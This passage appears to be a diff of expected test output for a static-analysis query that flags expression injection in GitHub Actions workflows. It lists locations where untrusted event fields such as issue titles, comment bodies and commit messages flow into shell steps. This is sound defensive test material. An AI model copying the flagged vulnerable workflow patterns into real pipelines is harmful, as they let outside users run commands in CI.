.github/workflows/comment_issue.yml:7:12:8:48 | \| | .github/workflows/comment_issue.yml:7:12:8:48 | \| | .github/workflows/comment_issue.yml:7:12:8:48 | \| | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/comment_issue.yml:13:12:13:50 | echo '$ ... ody }}' | .github/workflows/comment_issue.yml:13:12:13:50 | echo '$ ... ody }}' | .github/workflows/comment_issue.yml:13:12:13:50 | echo '$ ... ody }}' | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/comment_issue.yml:14:12:14:48 | echo '$ ... ody }}' | .github/workflows/comment_issue.yml:14:12:14:48 | echo '$ ... ody }}' | .github/workflows/comment_issue.yml:14:12:14:48 | echo '$ ... ody }}' | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/comment_issue.yml:15:12:15:49 | echo '$ ... tle }}' | .github/workflows/comment_issue.yml:15:12:15:49 | echo '$ ... tle }}' | .github/workflows/comment_issue.yml:15:12:15:49 | echo '$ ... tle }}' | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/comment_issue_newline.yml:9:14:10:50 | \| | .github/workflows/comment_issue_newline.yml:9:14:10:50 | \| | .github/workflows/comment_issue_newline.yml:9:14:10:50 | \| | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/cross3.yml:41:12:43:5 | \| | .github/workflows/cross3.yml:32:17:32:52 | ${{gith ... ssage}} | .github/workflows/cross3.yml:41:12:43:5 | \| | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/cross3.yml:47:12:53:109 | \| | .github/workflows/cross3.yml:32:17:32:52 | ${{gith ... ssage}} | .github/workflows/cross3.yml:47:12:53:109 | \| | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/discussion.yml:7:12:7:54 | echo '$ ... tle }}' | .github/workflows/discussion.yml:7:12:7:54 | echo '$ ... tle }}' | .github/workflows/discussion.yml:7:12:7:54 | echo '$ ... tle }}' | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/discussion.yml:8:12:8:53 | echo '$ ... ody }}' | .github/workflows/discussion.yml:8:12:8:53 | echo '$ ... ody }}' | .github/workflows/discussion.yml:8:12:8:53 | echo '$ ... ody }}' | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/discussion_comment.yml:7:12:7:54 | echo '$ ... tle }}' | .github/workflows/discussion_comment.yml:7:12:7:54 | echo '$ ... tle }}' | .github/workflows/discussion_comment.yml:7:12:7:54 | echo '$ ... tle }}' | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/discussion_comment.yml:8:12:8:53 | echo '$ ... ody }}' | .github/workflows/discussion_comment.yml:8:12:8:53 | echo '$ ... ody }}' | .github/workflows/discussion_comment.yml:8:12:8:53 | echo '$ ... ody }}' | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/discussion_comment.yml:9:12:9:50 | echo '$ ... ody }}' | .github/workflows/discussion_comment.yml:9:12:9:50 | echo '$ ... ody }}' | .github/workflows/discussion_comment.yml:9:12:9:50 | echo '$ ... ody }}' | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/gollum.yml:7:12:7:52 | echo '$ ... tle }}' | .github/workflows/gollum.yml:7:12:7:52 | echo '$ ... tle }}' | .github/workflows/gollum.yml:7:12:7:52 | echo '$ ... tle }}' | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/gollum.yml:8:12:8:53 | echo '$ ... tle }}' | .github/workflows/gollum.yml:8:12:8:53 | echo '$ ... tle }}' | .github/workflows/gollum.yml:8:12:8:53 | echo '$ ... tle }}' | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/gollum.yml:9:12:9:56 | echo '$ ... ame }}' | .github/workflows/gollum.yml:9:12:9:56 | echo '$ ... ame }}' | .github/workflows/gollum.yml:9:12:9:56 | echo '$ ... ame }}' | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/gollum.yml:10:12:10:59 | echo '$ ... ame }}' | .github/workflows/gollum.yml:10:12:10:59 | echo '$ ... ame }}' | .github/workflows/gollum.yml:10:12:10:59 | echo '$ ... ame }}' | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/image_link_generator.yml:36:14:37:126 | \| | .github/workflows/image_link_generator.yml:18:17:18:48 | ${{ git ... body }} | .github/workflows/image_link_generator.yml:36:14:37:126 | \| | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/inter-job0.yml:43:14:43:52 | echo ${ ... utput}} | .github/workflows/inter-job0.yml:22:9:26:6 | Uses Step: source | .github/workflows/inter-job0.yml:43:14:43:52 | echo ${ ... utput}} | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/inter-job1.yml:43:14:43:52 | echo ${ ... utput}} | .github/workflows/inter-job1.yml:22:9:26:6 | Uses Step: source | .github/workflows/inter-job1.yml:43:14:43:52 | echo ${ ... utput}} | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/inter-job2.yml:45:14:45:52 | echo ${ ... utput}} | .github/workflows/inter-job2.yml:22:9:26:6 | Uses Step: source | .github/workflows/inter-job2.yml:45:14:45:52 | echo ${ ... utput}} | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/inter-job4.yml:44:14:44:52 | echo ${ ... utput}} | .github/workflows/inter-job4.yml:22:9:26:6 | Uses Step: source | .github/workflows/inter-job4.yml:44:14:44:52 | echo ${ ... utput}} | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/issues.yaml:13:12:13:49 | echo '$ ... tle }}' | .github/workflows/issues.yaml:13:12:13:49 | echo '$ ... tle }}' | .github/workflows/issues.yaml:13:12:13:49 | echo '$ ... tle }}' | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/issues.yaml:14:12:14:48 | echo '$ ... ody }}' | .github/workflows/issues.yaml:14:12:14:48 | echo '$ ... ody }}' | .github/workflows/issues.yaml:14:12:14:48 | echo '$ ... ody }}' | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/issues.yaml:15:12:15:39 | echo '$ ... env }}' | .github/workflows/issues.yaml:4:15:4:45 | ${{ git ... itle }} | .github/workflows/issues.yaml:15:12:15:39 | echo '$ ... env }}' | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/issues.yaml:17:12:17:36 | echo '$ ... env }}' | .github/workflows/issues.yaml:10:16:10:46 | ${{ git ... itle }} | .github/workflows/issues.yaml:17:12:17:36 | echo '$ ... env }}' | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/issues.yaml:18:12:18:37 | echo '$ ... env }}' | .github/workflows/issues.yaml:20:19:20:49 | ${{ git ... itle }} | .github/workflows/issues.yaml:18:12:18:37 | echo '$ ... env }}' | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/matrix.yml:41:12:42:31 | \| | .github/workflows/matrix.yml:17:9:21:2 | Uses Step: set-matrix | .github/workflows/matrix.yml:41:12:42:31 | \| | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/pull_request_review.yml:7:12:7:56 | echo '$ ... tle }}' | .github/workflows/pull_request_review.yml:7:12:7:56 | echo '$ ... tle }}' | .github/workflows/pull_request_review.yml:7:12:7:56 | echo '$ ... tle }}' | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/pull_request_review.yml:8:12:8:55 | echo '$ ... ody }}' | .github/workflows/pull_request_review.yml:8:12:8:55 | echo '$ ... ody }}' | .github/workflows/pull_request_review.yml:8:12:8:55 | echo '$ ... ody }}' | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/pull_request_review.yml:9:12:9:61 | echo '$ ... bel }}' | .github/workflows/pull_request_review.yml:9:12:9:61 | echo '$ ... bel }}' | .github/workflows/pull_request_review.yml:9:12:9:61 | echo '$ ... bel }}' | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/pull_request_review.yml:10:12:10:75 | echo '$ ... nch }}' | .github/workflows/pull_request_review.yml:10:12:10:75 | echo '$ ... nch }}' | .github/workflows/pull_request_review.yml:10:12:10:75 | echo '$ ... nch }}' | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/pull_request_review.yml:11:12:11:72 | echo '$ ... ion }}' | .github/workflows/pull_request_review.yml:11:12:11:72 | echo '$ ... ion }}' | .github/workflows/pull_request_review.yml:11:12:11:72 | echo '$ ... ion }}' | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/pull_request_review.yml:12:12:12:69 | echo '$ ... age }}' | .github/workflows/pull_request_review.yml:12:12:12:69 | echo '$ ... age }}' | .github/workflows/pull_request_review.yml:12:12:12:69 | echo '$ ... age }}' | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/pull_request_review.yml:13:12:13:59 | echo '$ ... ref }}' | .github/workflows/pull_request_review.yml:13:12:13:59 | echo '$ ... ref }}' | .github/workflows/pull_request_review.yml:13:12:13:59 | echo '$ ... ref }}' | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/pull_request_review.yml:14:12:14:49 | echo '$ ... ody }}' | .github/workflows/pull_request_review.yml:14:12:14:49 | echo '$ ... ody }}' | .github/workflows/pull_request_review.yml:14:12:14:49 | echo '$ ... ody }}' | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/pull_request_review_comment.yml:7:12:7:56 | echo '$ ... tle }}' | .github/workflows/pull_request_review_comment.yml:7:12:7:56 | echo '$ ... tle }}' | .github/workflows/pull_request_review_comment.yml:7:12:7:56 | echo '$ ... tle }}' | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/pull_request_review_comment.yml:8:12:8:55 | echo '$ ... ody }}' | .github/workflows/pull_request_review_comment.yml:8:12:8:55 | echo '$ ... ody }}' | .github/workflows/pull_request_review_comment.yml:8:12:8:55 | echo '$ ... ody }}' | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/pull_request_review_comment.yml:9:12:9:61 | echo '$ ... bel }}' | .github/workflows/pull_request_review_comment.yml:9:12:9:61 | echo '$ ... bel }}' | .github/workflows/pull_request_review_comment.yml:9:12:9:61 | echo '$ ... bel }}' | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/pull_request_review_comment.yml:10:12:10:75 | echo '$ ... nch }}' | .github/workflows/pull_request_review_comment.yml:10:12:10:75 | echo '$ ... nch }}' | .github/workflows/pull_request_review_comment.yml:10:12:10:75 | echo '$ ... nch }}' | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/pull_request_review_comment.yml:11:12:11:72 | echo '$ ... ion }}' | .github/workflows/pull_request_review_comment.yml:11:12:11:72 | echo '$ ... ion }}' | .github/workflows/pull_request_review_comment.yml:11:12:11:72 | echo '$ ... ion }}' | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/pull_request_review_comment.yml:12:12:12:69 | echo '$ ... age }}' | .github/workflows/pull_request_review_comment.yml:12:12:12:69 | echo '$ ... age }}' | .github/workflows/pull_request_review_comment.yml:12:12:12:69 | echo '$ ... age }}' | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/pull_request_review_comment.yml:13:12:13:59 | echo '$ ... ref }}' | .github/workflows/pull_request_review_comment.yml:13:12:13:59 | echo '$ ... ref }}' | .github/workflows/pull_request_review_comment.yml:13:12:13:59 | echo '$ ... ref }}' | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/pull_request_review_comment.yml:14:12:14:50 | echo '$ ... ody }}' | .github/workflows/pull_request_review_comment.yml:14:12:14:50 | echo '$ ... ody }}' | .github/workflows/pull_request_review_comment.yml:14:12:14:50 | echo '$ ... ody }}' | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/pull_request_target.yml:7:12:7:49 | echo '$ ... tle }}' | .github/workflows/pull_request_target.yml:7:12:7:49 | echo '$ ... tle }}' | .github/workflows/pull_request_target.yml:7:12:7:49 | echo '$ ... tle }}' | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/pull_request_target.yml:8:12:8:48 | echo '$ ... ody }}' | .github/workflows/pull_request_target.yml:8:12:8:48 | echo '$ ... ody }}' | .github/workflows/pull_request_target.yml:8:12:8:48 | echo '$ ... ody }}' | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/pull_request_target.yml:9:12:9:56 | echo '$ ... tle }}' | .github/workflows/pull_request_target.yml:9:12:9:56 | echo '$ ... tle }}' | .github/workflows/pull_request_target.yml:9:12:9:56 | echo '$ ... tle }}' | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/pull_request_target.yml:10:12:10:55 | echo '$ ... ody }}' | .github/workflows/pull_request_target.yml:10:12:10:55 | echo '$ ... ody }}' | .github/workflows/pull_request_target.yml:10:12:10:55 | echo '$ ... ody }}' | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/pull_request_target.yml:11:12:11:61 | echo '$ ... bel }}' | .github/workflows/pull_request_target.yml:11:12:11:61 | echo '$ ... bel }}' | .github/workflows/pull_request_target.yml:11:12:11:61 | echo '$ ... bel }}' | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/pull_request_target.yml:12:12:12:75 | echo '$ ... nch }}' | .github/workflows/pull_request_target.yml:12:12:12:75 | echo '$ ... nch }}' | .github/workflows/pull_request_target.yml:12:12:12:75 | echo '$ ... nch }}' | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/pull_request_target.yml:13:12:13:72 | echo '$ ... ion }}' | .github/workflows/pull_request_target.yml:13:12:13:72 | echo '$ ... ion }}' | .github/workflows/pull_request_target.yml:13:12:13:72 | echo '$ ... ion }}' | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/pull_request_target.yml:14:12:14:69 | echo '$ ... age }}' | .github/workflows/pull_request_target.yml:14:12:14:69 | echo '$ ... age }}' | .github/workflows/pull_request_target.yml:14:12:14:69 | echo '$ ... age }}' | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/pull_request_target.yml:15:12:15:59 | echo '$ ... ref }}' | .github/workflows/pull_request_target.yml:15:12:15:59 | echo '$ ... ref }}' | .github/workflows/pull_request_target.yml:15:12:15:59 | echo '$ ... ref }}' | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/pull_request_target.yml:16:12:16:40 | echo '$ ... ref }}' | .github/workflows/pull_request_target.yml:16:12:16:40 | echo '$ ... ref }}' | .github/workflows/pull_request_target.yml:16:12:16:40 | echo '$ ... ref }}' | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/push.yml:7:12:7:57 | echo '$ ... age }}' | .github/workflows/push.yml:7:12:7:57 | echo '$ ... age }}' | .github/workflows/push.yml:7:12:7:57 | echo '$ ... age }}' | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/push.yml:8:12:8:62 | echo '$ ... ail }}' | .github/workflows/push.yml:8:12:8:62 | echo '$ ... ail }}' | .github/workflows/push.yml:8:12:8:62 | echo '$ ... ail }}' | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/push.yml:9:12:9:61 | echo '$ ... ame }}' | .github/workflows/push.yml:9:12:9:61 | echo '$ ... ame }}' | .github/workflows/push.yml:9:12:9:61 | echo '$ ... ame }}' | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/push.yml:10:12:10:57 | echo '$ ... age }}' | .github/workflows/push.yml:10:12:10:57 | echo '$ ... age }}' | .github/workflows/push.yml:10:12:10:57 | echo '$ ... age }}' | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/push.yml:11:12:11:62 | echo '$ ... ail }}' | .github/workflows/push.yml:11:12:11:62 | echo '$ ... ail }}' | .github/workflows/push.yml:11:12:11:62 | echo '$ ... ail }}' | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/push.yml:12:12:12:61 | echo '$ ... ame }}' | .github/workflows/push.yml:12:12:12:61 | echo '$ ... ame }}' | .github/workflows/push.yml:12:12:12:61 | echo '$ ... ame }}' | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/push.yml:13:12:13:65 | echo '$ ... ail }}' | .github/workflows/push.yml:13:12:13:65 | echo '$ ... ail }}' | .github/workflows/push.yml:13:12:13:65 | echo '$ ... ail }}' | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/push.yml:14:12:14:64 | echo '$ ... ame }}' | .github/workflows/push.yml:14:12:14:64 | echo '$ ... ame }}' | .github/workflows/push.yml:14:12:14:64 | echo '$ ... ame }}' | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/push.yml:15:12:15:65 | echo '$ ... ail }}' | .github/workflows/push.yml:15:12:15:65 | echo '$ ... ail }}' | .github/workflows/push.yml:15:12:15:65 | echo '$ ... ail }}' | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/push.yml:16:12:16:64 | echo '$ ... ame }}' | .github/workflows/push.yml:16:12:16:64 | echo '$ ... ame }}' | .github/workflows/push.yml:16:12:16:64 | echo '$ ... ame }}' | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/simple1.yml:15:14:16:50 | \| | .github/workflows/simple1.yml:11:19:11:57 | ${{ git ... sage }} | .github/workflows/simple1.yml:15:14:16:50 | \| | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/simple2.yml:28:14:31:15 | \| | .github/workflows/simple2.yml:14:9:18:6 | Uses Step: source | .github/workflows/simple2.yml:28:14:31:15 | \| | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/test.yml:37:14:37:52 | echo ${ ... utput}} | .github/workflows/test.yml:15:19:15:57 | ${{ git ... sage }} | .github/workflows/test.yml:37:14:37:52 | echo ${ ... utput}} | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/workflow_run.yml:9:12:9:64 | echo '$ ... tle }}' | .github/workflows/workflow_run.yml:9:12:9:64 | echo '$ ... tle }}' | .github/workflows/workflow_run.yml:9:12:9:64 | echo '$ ... tle }}' | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/workflow_run.yml:10:12:10:70 | echo '$ ... age }}' | .github/workflows/workflow_run.yml:10:12:10:70 | echo '$ ... age }}' | .github/workflows/workflow_run.yml:10:12:10:70 | echo '$ ... age }}' | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/workflow_run.yml:11:12:11:75 | echo '$ ... ail }}' | .github/workflows/workflow_run.yml:11:12:11:75 | echo '$ ... ail }}' | .github/workflows/workflow_run.yml:11:12:11:75 | echo '$ ... ail }}' | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/workflow_run.yml:12:12:12:74 | echo '$ ... ame }}' | .github/workflows/workflow_run.yml:12:12:12:74 | echo '$ ... ame }}' | .github/workflows/workflow_run.yml:12:12:12:74 | echo '$ ... ame }}' | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/workflow_run.yml:13:12:13:78 | echo '$ ... ail }}' | .github/workflows/workflow_run.yml:13:12:13:78 | echo '$ ... ail }}' | .github/workflows/workflow_run.yml:13:12:13:78 | echo '$ ... ail }}' | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/workflow_run.yml:14:12:14:77 | echo '$ ... ame }}' | .github/workflows/workflow_run.yml:14:12:14:77 | echo '$ ... ame }}' | .github/workflows/workflow_run.yml:14:12:14:77 | echo '$ ... ame }}' | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/workflow_run.yml:15:12:15:62 | echo '$ ... nch }}' | .github/workflows/workflow_run.yml:15:12:15:62 | echo '$ ... nch }}' | .github/workflows/workflow_run.yml:15:12:15:62 | echo '$ ... nch }}' | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/workflow_run.yml:16:12:16:78 | echo '$ ... ion }}' | .github/workflows/workflow_run.yml:16:12:16:78 | echo '$ ... ion }}' | .github/workflows/workflow_run.yml:16:12:16:78 | echo '$ ... ion }}' | Potential expression injection, which may be controlled by an external user. | -| action1/action.yml:14:12:14:50 | echo '$ ... ody }}' | action1/action.yml:14:12:14:50 | echo '$ ... ody }}' | action1/action.yml:14:12:14:50 | echo '$ ... ody }}' | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/argus_case_study.yml:27:33:27:77 | steps.remove_quotations.outputs.replaced | .github/workflows/argus_case_study.yml:17:25:17:53 | github.event.issue.title | .github/workflows/argus_case_study.yml:27:33:27:77 | steps.remove_quotations.outputs.replaced | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/argus_case_study.yml:27:33:27:77 | steps.remove_quotations.outputs.replaced | ${{steps.remove_quotations.outputs.replaced}} | +| .github/workflows/changed-files.yml:22:24:22:75 | steps.changed-files.outputs.all_changed_files | .github/workflows/changed-files.yml:16:9:20:6 | Uses Step: changed-files | .github/workflows/changed-files.yml:22:24:22:75 | steps.changed-files.outputs.all_changed_files | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/changed-files.yml:22:24:22:75 | steps.changed-files.outputs.all_changed_files | ${{ steps.changed-files.outputs.all_changed_files }} | +| .github/workflows/comment_issue.yml:9:15:9:46 | github.event.comment.body | .github/workflows/comment_issue.yml:9:15:9:46 | github.event.comment.body | .github/workflows/comment_issue.yml:9:15:9:46 | github.event.comment.body | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue.yml:9:15:9:46 | github.event.comment.body | ${{ github.event.comment.body }} | +| .github/workflows/comment_issue.yml:15:19:15:50 | github.event.comment.body | .github/workflows/comment_issue.yml:15:19:15:50 | github.event.comment.body | .github/workflows/comment_issue.yml:15:19:15:50 | github.event.comment.body | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue.yml:15:19:15:50 | github.event.comment.body | ${{ github.event.comment.body }} | +| .github/workflows/comment_issue.yml:16:19:16:48 | github.event.issue.body | .github/workflows/comment_issue.yml:16:19:16:48 | github.event.issue.body | .github/workflows/comment_issue.yml:16:19:16:48 | github.event.issue.body | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue.yml:16:19:16:48 | github.event.issue.body | ${{ github.event.issue.body }} | +| .github/workflows/comment_issue.yml:17:19:17:49 | github.event.issue.title | .github/workflows/comment_issue.yml:17:19:17:49 | github.event.issue.title | .github/workflows/comment_issue.yml:17:19:17:49 | github.event.issue.title | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue.yml:17:19:17:49 | github.event.issue.title | ${{ github.event.issue.title }} | +| .github/workflows/comment_issue.yml:24:31:24:62 | github.event.comment.body | .github/workflows/comment_issue.yml:24:31:24:62 | github.event.comment.body | .github/workflows/comment_issue.yml:24:31:24:62 | github.event.comment.body | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue.yml:24:31:24:62 | github.event.comment.body | ${{ github.event.comment.body }} | +| .github/workflows/comment_issue.yml:27:31:27:60 | github.event.issue.body | .github/workflows/comment_issue.yml:27:31:27:60 | github.event.issue.body | .github/workflows/comment_issue.yml:27:31:27:60 | github.event.issue.body | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue.yml:27:31:27:60 | github.event.issue.body | ${{ github.event.issue.body }} | +| .github/workflows/comment_issue.yml:30:31:30:61 | github.event.issue.title | .github/workflows/comment_issue.yml:30:31:30:61 | github.event.issue.title | .github/workflows/comment_issue.yml:30:31:30:61 | github.event.issue.title | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue.yml:30:31:30:61 | github.event.issue.title | ${{ github.event.issue.title }} | +| .github/workflows/comment_issue_newline.yml:10:25:10:56 | github.event.comment.body | .github/workflows/comment_issue_newline.yml:10:25:10:56 | github.event.comment.body | .github/workflows/comment_issue_newline.yml:10:25:10:56 | github.event.comment.body | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue_newline.yml:10:25:10:56 | github.event.comment.body | ${{ github.event.comment.body }} | +| .github/workflows/comment_issue_newline.yml:11:24:11:51 | github.event.issue.body | .github/workflows/comment_issue_newline.yml:11:24:11:51 | github.event.issue.body | .github/workflows/comment_issue_newline.yml:11:24:11:51 | github.event.issue.body | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue_newline.yml:11:24:11:51 | github.event.issue.body | ${{github.event.issue.body}} | +| .github/workflows/comment_issue_newline.yml:12:24:12:55 | github.event.comment.body | .github/workflows/comment_issue_newline.yml:12:24:12:55 | github.event.comment.body | .github/workflows/comment_issue_newline.yml:12:24:12:55 | github.event.comment.body | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue_newline.yml:12:24:12:55 | github.event.comment.body | ${{ github.event.comment.body }} | +| .github/workflows/cross3.yml:42:86:42:113 | env.ISSUE_BODY_PARSED | .github/workflows/cross3.yml:32:18:32:53 | github.event.commits[0].message | .github/workflows/cross3.yml:42:86:42:113 | env.ISSUE_BODY_PARSED | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/cross3.yml:42:86:42:113 | env.ISSUE_BODY_PARSED | ${{ env.ISSUE_BODY_PARSED }} | +| .github/workflows/cross3.yml:53:89:53:107 | env.pr_message | .github/workflows/cross3.yml:32:18:32:53 | github.event.commits[0].message | .github/workflows/cross3.yml:53:89:53:107 | env.pr_message | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/cross3.yml:53:89:53:107 | env.pr_message | ${{env.pr_message}} | +| .github/workflows/discussion.yml:7:19:7:54 | github.event.discussion.title | .github/workflows/discussion.yml:7:19:7:54 | github.event.discussion.title | .github/workflows/discussion.yml:7:19:7:54 | github.event.discussion.title | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/discussion.yml:7:19:7:54 | github.event.discussion.title | ${{ github.event.discussion.title }} | +| .github/workflows/discussion.yml:8:19:8:53 | github.event.discussion.body | .github/workflows/discussion.yml:8:19:8:53 | github.event.discussion.body | .github/workflows/discussion.yml:8:19:8:53 | github.event.discussion.body | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/discussion.yml:8:19:8:53 | github.event.discussion.body | ${{ github.event.discussion.body }} | +| .github/workflows/discussion_comment.yml:7:19:7:54 | github.event.discussion.title | .github/workflows/discussion_comment.yml:7:19:7:54 | github.event.discussion.title | .github/workflows/discussion_comment.yml:7:19:7:54 | github.event.discussion.title | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/discussion_comment.yml:7:19:7:54 | github.event.discussion.title | ${{ github.event.discussion.title }} | +| .github/workflows/discussion_comment.yml:8:19:8:53 | github.event.discussion.body | .github/workflows/discussion_comment.yml:8:19:8:53 | github.event.discussion.body | .github/workflows/discussion_comment.yml:8:19:8:53 | github.event.discussion.body | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/discussion_comment.yml:8:19:8:53 | github.event.discussion.body | ${{ github.event.discussion.body }} | +| .github/workflows/discussion_comment.yml:9:19:9:50 | github.event.comment.body | .github/workflows/discussion_comment.yml:9:19:9:50 | github.event.comment.body | .github/workflows/discussion_comment.yml:9:19:9:50 | github.event.comment.body | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/discussion_comment.yml:9:19:9:50 | github.event.comment.body | ${{ github.event.comment.body }} | +| .github/workflows/gollum.yml:7:19:7:52 | github.event.pages[1].title | .github/workflows/gollum.yml:7:19:7:52 | github.event.pages[1].title | .github/workflows/gollum.yml:7:19:7:52 | github.event.pages[1].title | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/gollum.yml:7:19:7:52 | github.event.pages[1].title | ${{ github.event.pages[1].title }} | +| .github/workflows/gollum.yml:8:19:8:53 | github.event.pages[11].title | .github/workflows/gollum.yml:8:19:8:53 | github.event.pages[11].title | .github/workflows/gollum.yml:8:19:8:53 | github.event.pages[11].title | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/gollum.yml:8:19:8:53 | github.event.pages[11].title | ${{ github.event.pages[11].title }} | +| .github/workflows/gollum.yml:9:19:9:56 | github.event.pages[0].page_name | .github/workflows/gollum.yml:9:19:9:56 | github.event.pages[0].page_name | .github/workflows/gollum.yml:9:19:9:56 | github.event.pages[0].page_name | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/gollum.yml:9:19:9:56 | github.event.pages[0].page_name | ${{ github.event.pages[0].page_name }} | +| .github/workflows/gollum.yml:10:19:10:59 | github.event.pages[2222].page_name | .github/workflows/gollum.yml:10:19:10:59 | github.event.pages[2222].page_name | .github/workflows/gollum.yml:10:19:10:59 | github.event.pages[2222].page_name | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/gollum.yml:10:19:10:59 | github.event.pages[2222].page_name | ${{ github.event.pages[2222].page_name }} | +| .github/workflows/image_link_generator.yml:37:85:37:125 | steps.trim-url.outputs.trimmed_url | .github/workflows/image_link_generator.yml:18:18:18:49 | github.event.comment.body | .github/workflows/image_link_generator.yml:37:85:37:125 | steps.trim-url.outputs.trimmed_url | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/image_link_generator.yml:37:85:37:125 | steps.trim-url.outputs.trimmed_url | ${{ steps.trim-url.outputs.trimmed_url }} | +| .github/workflows/inter-job0.yml:43:20:43:53 | needs.job1.outputs.job_output | .github/workflows/inter-job0.yml:22:9:26:6 | Uses Step: source | .github/workflows/inter-job0.yml:43:20:43:53 | needs.job1.outputs.job_output | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/inter-job0.yml:43:20:43:53 | needs.job1.outputs.job_output | ${{needs.job1.outputs.job_output}} | +| .github/workflows/inter-job1.yml:43:20:43:53 | needs.job1.outputs.job_output | .github/workflows/inter-job1.yml:22:9:26:6 | Uses Step: source | .github/workflows/inter-job1.yml:43:20:43:53 | needs.job1.outputs.job_output | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/inter-job1.yml:43:20:43:53 | needs.job1.outputs.job_output | ${{needs.job1.outputs.job_output}} | +| .github/workflows/inter-job2.yml:45:20:45:53 | needs.job1.outputs.job_output | .github/workflows/inter-job2.yml:22:9:26:6 | Uses Step: source | .github/workflows/inter-job2.yml:45:20:45:53 | needs.job1.outputs.job_output | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/inter-job2.yml:45:20:45:53 | needs.job1.outputs.job_output | ${{needs.job1.outputs.job_output}} | +| .github/workflows/inter-job4.yml:44:20:44:53 | needs.job1.outputs.job_output | .github/workflows/inter-job4.yml:22:9:26:6 | Uses Step: source | .github/workflows/inter-job4.yml:44:20:44:53 | 